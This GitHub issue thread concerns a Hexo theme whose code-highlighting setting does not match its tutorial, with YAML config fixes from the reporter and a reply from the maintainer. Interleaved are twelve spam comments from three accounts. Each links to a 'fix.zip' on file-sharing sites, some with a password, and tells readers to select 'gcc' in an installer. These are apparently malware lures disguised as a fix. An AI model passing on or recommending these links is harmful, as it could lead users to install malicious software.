### ISSUE TITLE
[BUG]代码高亮功能开关方式与教程不符

### ISSUE THREAD

**Issue by K4N114** [f-dong/hexo-theme-minimalism#43]
**Bug 描述**
按照教程https://minimalism.codeover.cn/docs/config/info#%E4%BB%A3%E7%A0%81%E9%AB%98%E4%BA%AE
操作后，代码高亮**并不生效**。

从默认状态开始，将highlight项中添加enable: true子项后，代码高亮功能**生效**。
（除了添加enable: true外没有进行任何改动）
```
syntax_highlighter: highlight.js
highlight:
  enable: true
  line_number: true
  auto_detect: false
  tab_replace: ''
  wrap: true
  hljs: false
prismjs:
  preprocess: true
  line_number: true
  tab_replace: ''
```

**电脑：**
 - 操作系统：windows11
 - 浏览器 edge 
 - 版本 128.0.2739.42 (正式版本) (64 位)

**其他**
很喜欢主题，谢谢分享！
可以给个捐赠通道~

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by f-dong** [comment]
因为 HEXO 7.0 以上版本配置文件发生了改变导致了这个问题，我尝试对此更改进行了兼容，麻烦尝试将主题更新至 1.4.0 版本再尝试一下

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by K4N114** [comment]
# 代码高亮问题
遗憾的是，本次更新并没有解决问题，问题和之前一样，没有发生任何变化。
但我查到了官方文档中的相关说明，并将这一段替换您原本写的代码，即可正常使用prismjs。
简单分析了一下，还是因为版本更替代码不同导致的不生效。
如果您认为该改动合理的话，可以考虑纳入教程中。

https://hexo.io/zh-cn/docs/syntax-highlight#PrismJS
## _config.yml
```
//版本低于 ver 7.0.0
highlight:
  enable: false
prismjs:
  enable: true
  preprocess: true
  line_number: true
  line_threshold: 0
  tab_replace: ""
```
```
//版本高于 ver 7.0.0
syntax_highlighter: prismjs
prismjs:
  preprocess: true
  line_number: true
  line_threshold: 0
  tab_replace: ""
```

# 其他问题
另外目前代码块之间不会有间隔，不知道是否是有意为之的？
使用heightlight模式下是有间隔的。（和大部分网站默认的显示效果相同）
![image](https://github.com/user-attachments/assets/169e7714-f6ef-4972-91f0-6021dcea7b93)
```csharp
public float f1;

void Test()
{
    Debug.Log(f1);
}
```

```
highlight:
  enable: false
  line_number: true
  auto_detect: false
  tab_replace: ''
  wrap: true
  hljs: false
prismjs:
  enable: true
  preprocess: true
  line_number: true
  tab_replace: ''
```
